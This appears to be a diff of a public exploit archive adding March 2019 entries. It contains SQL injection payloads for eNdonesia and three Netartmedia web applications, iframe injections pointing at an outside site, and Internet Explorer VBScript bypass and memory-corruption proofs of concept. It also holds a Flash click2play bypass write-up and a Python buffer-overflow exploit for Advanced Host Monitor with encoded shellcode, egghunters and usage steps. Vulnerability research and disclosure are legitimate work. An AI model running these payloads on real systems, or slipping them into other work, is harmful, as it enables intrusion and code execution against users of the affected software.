COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'user.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management
system (CMS)
site management system , online publishing system, or whatever you want
to name it.
For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : email, user.php
# Attack Pattern : 1'+OR+1=1+OR+'cw'='cw
# POST Method : http://localhost/endonesia87/user.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'admin.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management
system (CMS)
site management system , online publishing system, or whatever you want
to name it.
For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : bid, admin.php
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/admin.php?op=BannerDelete&bid=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&ok=3
===========================================================================================
===========================================================================================
# Exploit Title: eNdonesia Portal 'bid' Frame Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management
system (CMS)
site management system , online publishing system, or whatever you want
to name it.
For internet, intranet, or on your own PC.
===========================================================================================
# POC - Frame Inj.
# Parameters : bid, admin.php
# Attack Pattern :
%3ciframe+src%3d%22http%3a%2f%2fCyber-Warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# GET Method : http://localhost/endonesia87/admin.php?op=BannerDelete&bid=<iframe
src="http://Cyber-Warrior.org/?"></iframe>&ok=3
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: eNdonesia Portal 'fname' Frame Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management
system (CMS)
site management system , online publishing system, or whatever you want
to name it.
For internet, intranet, or on your own PC.
===========================================================================================
# POC - Frame Inj.
# Parameters : fname, admin.php, comments
# Attack Pattern :
%3ciframe+src%3d%22http%3a%2f%2fCyber-Warrior.org%2f%3f%22%3e%3c%2fiframe%3e
# POST Method : http://localhost/endonesia87/friend.php
===========================================================================================
###########################################################################################

16
exploits/php/webapps/46560.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/eventportal/
# Demo Site: https://www.phpscriptdemos.com/events/
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description: Event Portal is a a web software (php script), that can be
used to create advanced and multi-user event listing and ticket selling
websites.
----- PoC: SQLi (time-based blind) -----
# POST Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email
# Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'

22
exploits/php/webapps/46562.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/mall/
# Demo Site: https://www.phpscriptdemos.com/mall/
# Version: 4.1
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Mall is one of the first multi-stores and multi-vendors
php scripts (offered since 2006) and successfully used on many websites
today.
----- PoC 1 : SQLi (time-based blind) -----
# Request: http://localhost/[PATH]/index.php
# Parameter: id (GET)
# Payload: id=1 AND SLEEP(5)&item=&lang=en&mod=details
----- PoC 2 : SQLi (time-based blind) ----
# Request: http://localhost/[PATH]/loginaction.php
# Parameter: Email (POST)
# Payload: Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)
AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en

58
exploits/php/webapps/46563.txt Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/realestate/
# Demo Site: https://www.phpscriptdemos.com/realestate/
# Version: 5.0
# Tested on: Kali Linux
# CVE: N/A
# Description: The real estate portal software is made to be
multi-language, the main site can show multiple languages and let the site
visitors choose their preferred language.
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: user_email (POST)
Payload:
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
OR SLEEP(5)#
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: MULTIPART page ((custom) POST
Payload:
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="SubmitContact"
1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="code"
94102
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="email"
sample@email.tst
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="message"
20
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="name"
${alpharand}
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="page"
en_Contact-2228' OR 3801=3801-- eISZ
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="phone"
555-666-0606
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="subject"
1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0--

36
exploits/windows/dos/46567.html Normal file
View file

@ -0,0 +1,36 @@
<!--
Windows: Windows: IE11 VBScript execution policy bypass in MSHTML
Platform: Windows 10 1809 (not tested earlier)
Class: Security Feature Bypass
Summary:
MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesnt check other VBScript CLSIDs which allow a web page to bypass the security zone policy.
Description:
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
The check for the VBScript security zone policy is done in MSHTML!AllowVBScript which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language which has a slightly different CLSID of {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. Therefore to bypass the VBScript zone security policy its possible to just change the language attribute in the HTML from “VBScript” to “VBScript.Encode”. To add insult to injury you dont even need to encode the VBScript as if the engine detects the script is not encoded it tries to parse it as unencoded script.
Proof of Concept:
Ive provided a PoC as a HTML file with a meta tag to force IE5 compatibility. Just host on an HTTP server.
1) Browse IE11 to the PoC on the web server.
Expected Result:
No VBScript is executed.
Observed Result:
VBScript is executed and a message box is displayed.
-->
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=5">
</head>
<body>
<script language="VBScript.Encode">
MsgBox "Hello"
</script>
</body>
</html>

77
exploits/windows/dos/46568.html Normal file
View file

@ -0,0 +1,77 @@
<!--
There is an issue in VBScript in the VbsErase function. In some cases (see the attached PoC), VbsErase fails to clear the argument variable properly, which can trivially lead to crafting a variable with the array type, but with a pointer controlled controlled by an attacker. This issue was most likely introduced in an attempt to fix a previously reported issue in VbsErase (https://bugs.chromium.org/p/project-zero/issues/detail?id=1668).
Debug log (Note: this was tested on Windows 10 64-bit v1809 with the most recent patches applied):
(25b4.efc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e mov edi,dword ptr [esi] ds:002b:13371337=????????
0:009:x86> r
eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44
eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e mov edi,dword ptr [esi] ds:002b:13371337=????????
0:009:x86> k
# ChildEBP RetAddr
00 05c5ca48 6e0beac7 VBSCRIPT!VbsErase+0x5a
01 05c5ca64 6e0b9d64 VBSCRIPT!StaticEntryPoint::Call+0x37
02 05c5cb9c 6e0b8297 VBSCRIPT!CScriptRuntime::RunNoEH+0xc94
03 05c5cbec 6e0b81b5 VBSCRIPT!CScriptRuntime::Run+0xc7
04 05c5ccfc 6e0b354d VBSCRIPT!CScriptEntryPoint::Call+0xe5
05 05c5cd90 6e0ae175 VBSCRIPT!CSession::Execute+0x52d
06 05c5cdd8 6e0c0638 VBSCRIPT!COleScript::ExecutePendingScripts+0x14a
07 05c5ce6c 6e0c03e9 VBSCRIPT!COleScript::ParseScriptTextCore+0x24b
08 05c5ce98 7053ff31 VBSCRIPT!COleScript::ParseScriptText+0x29
09 05c5ced0 7053f847 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
0a 05c5cf40 7053ee02 MSHTML!CScriptCollection::ParseScriptText+0x182
0b 05c5d02c 7053f50e MSHTML!CScriptData::CommitCode+0x312
0c 05c5d0a8 7053e35a MSHTML!CScriptData::Execute+0x1ba
0d 05c5d0c8 7053c526 MSHTML!CHtmScriptParseCtx::Execute+0xaa
0e 05c5d11c 70635a4c MSHTML!CHtmParseBase::Execute+0x186
0f 05c5d13c 70635319 MSHTML!CHtmPost::Broadcast+0x14c
10 05c5d264 7060b4dd MSHTML!CHtmPost::Exec+0x339
11 05c5d284 7060b3d6 MSHTML!CHtmPost::Run+0x3d
12 05c5d2a4 7060b368 MSHTML!PostManExecute+0x60
13 05c5d2b8 7060b2d9 MSHTML!PostManResume+0x6f
14 05c5d2e8 70596767 MSHTML!CHtmPost::OnDwnChanCallback+0x39
15 05c5d300 70637b9b MSHTML!CDwnChan::OnMethodCall+0x27
16 05c5d37c 706381b3 MSHTML!GlobalWndOnMethodCall+0x1cb
17 05c5d3cc 75dc635b MSHTML!GlobalWndProc+0x1f3
18 05c5d3f8 75db729c USER32!_InternalCallWinProc+0x2b
19 05c5d4dc 75db63db USER32!UserCallWinProcCheckWow+0x3ac
1a 05c5d550 75db61b0 USER32!DispatchMessageWorker+0x21b
1b 05c5d55c 71a41e05 USER32!DispatchMessageW+0x10
1c 05c5f6e0 71a413b3 IEFRAME!CTabWindow::_TabWindowThreadProc+0x435
1d 05c5f7a0 724bdf6c IEFRAME!LCIETab_ThreadProc+0x403
1e 05c5f7b8 715b24bd msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1f 05c5f7f0 75fdfe09 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
20 05c5f800 77ab662d KERNEL32!BaseThreadInitThunk+0x19
21 05c5f85c 77ab65fd ntdll_77a50000!__RtlUserThreadStart+0x2f
22 05c5f86c 00000000 ntdll_77a50000!_RtlUserThreadStart+0x1b
-->
<!-- saved from url=(0016)http://localhost -->
<meta http-equiv="x-ua-compatible" content="IE=10">
<script type="text/vbscript">
Class class5
Private Sub Class_Terminate()
var4 = &h13371337
ReDim var4(10000000000)
End Sub
End Class
On Error Resume Next
msgbox "start"
Dim var4(10)
set var4(1) = new class5
Erase var4
Erase var4
</script>

48
exploits/windows/dos/46569.txt Normal file
View file

@ -0,0 +1,48 @@
Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com (screenshot attached), but can load a swf from any domain and also the PoC itself can be hosted on any domain. Note that there is a race condition wrt displaying the loaded Flash object, so if you run the PoC and don't see anything after several seconds, please refresh the page or load the PoC again. However, it worked pretty reliably in my experiments.
To see how it works, let's first examine the CObjectElement::FinalCreateObject, which gets called eventually after a new <object> element is created. The code relevant for this vulnerability is:
int CObjectElement::FinalCreateObject(...) {
CLSID clsid;
...
RetrieveClassidAndData(..., &clsid, ...)
...
if(!COleSite::AllowCreate(this, clsid, ...)) {
OnFailToCreate();
return 0x80070005;
}
...
if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...)) {
...
CView::AddPendingSizeDeterminationOleSite(...)
} else {
COleSite::CreateObject(this, clsid);
}
...
}
Looking at the line
if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...))
you can see that if clsid is Flash clsid and if IsFlashCreateable() returns true, the Flash object will be loaded at a later time. This happens in COleSite::ProcessObjectAfterSizeDetermined after checking if either the user explicitly allowed Flash for this site, or if the site is "trusted by platform". This is how Flash objects are normally loaded.
However, in the opposite case, if clsid != CLSID_MacromediaSwFlash *or* if IsFlashCreateable() returns false (regardless of the clsid), COleSite::CreateObject is called, which creates the object immediately without performing any additional checks. Essentially the logic here in case of clsid == CLSID_MacromediaSwFlash is "If Flash isn't creatable, create the Flash object anyway", which is a bit strange and which is what the PoC exploits.
However, exercising this path is not trivial because of the earlier AllowCreate() check. AllowCreate() and IsFlashCreateable() perform very similar checks - they both eventually call COleSite::AllowCreateSecurityChecks. This means that in most of the cases where IsFlashCreateable() returns false, AllowCreate() returns false as well.
In most cases, but not all :-)
Specifically, in COleSite::AllowCreate, if the current <object> element does not have an associated Markup (is not a part of any element tree), then AllowCreate() calls COleSite::AllowCreateSecurityChecks() with the 4th argument set to 0. This has the effect that most checks will be skipped and AllowCreate() will return true (almost) always.
Now we just need to make CDOMPluginArray::IsFlashCreateable return false, and in the PoC this is done by making the associated document of the current <object> element a "dynamic" document.
This way, COleSite::CreateObject is called without click2play checks.
However, if we leave a PoC at this stage, there is going to be a (non-fatal) exception in communication between the Content Process and the Plugin Process. I'm not sure if this happens before or after the Flash object is actually loaded. In any case, we can avoid this by quickly putting the <object> element into a "normal" document tree. This also causes the Flash object to be shown on the page normally, for a dramatic effect :-)
Please also note that most of the logic shown above for CObjectElement::FinalCreateObject is also present in CPluginSite::FinishCreateObject, which is used for handling for example <embed> elements. While the current PoC does not work on <embed> elements as is, it might be possible to make it work with some modifications. So, when fixing CObjectElement::FinalCreateObject, please remember to also address CPluginSite::FinishCreateObject.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46569.zip

124
exploits/windows/local/46561.py Executable file
View file

@ -0,0 +1,124 @@
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-18 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe #
# Version: 11.92 beta #
# The Program also has SEH Overflow, Which can be implemented in a similar way #
# Special Thanks to my wife #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close #
# Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or #
# egghunter-win10.txt (depend on your windows version) into "load specific HTML file" --> Save --> Wait a litle --> #
# Shellcode (Calc) open #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#------------------------------------------------------------------------------------------------------------------------------------#
#--------------------------------------------------- EGG Shellcode Generation ---------------------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#----------------------------------------------- EGG Hunter Shellcode Generation ----------------------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"
eip = "\x4d\x37\x41"
buffer = egghunter + "\x41" * (268 - len(egghunter)) + eip
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (268 - len(egghunter10)) + eip
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()

18
files_exploits.csv
View file

@ -6304,6 +6304,7 @@ id,file,description,date,author,type,platform,port
46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android,
46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows,
46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows,
46564,exploits/linux/dos/46564.txt,"libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons",2019-03-19,"Google Security Research",dos,linux,
46356,exploits/android/dos/46356.txt,"Android - binder Use-After-Free via fdget() Optimization",2019-02-12,"Google Security Research",dos,android,
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
@ -6358,6 +6359,13 @@ id,file,description,date,author,type,platform,port
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
46565,exploits/multiple/dos/46565.txt,"Google Chrome < M73 - Double-Destruction Race in StoragePartitionService",2019-03-19,"Google Security Research",dos,multiple,
46566,exploits/multiple/dos/46566.txt,"Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter",2019-03-19,"Google Security Research",dos,multiple,
46567,exploits/windows/dos/46567.html,"Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML",2019-03-19,"Google Security Research",dos,windows,
46568,exploits/windows/dos/46568.html,"Microsoft VBScript - VbsErase Memory Corruption",2019-03-19,"Google Security Research",dos,windows,
46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10362,6 +10370,7 @@ id,file,description,date,author,type,platform,port
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17258,6 +17267,7 @@ id,file,description,date,author,type,platform,port
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
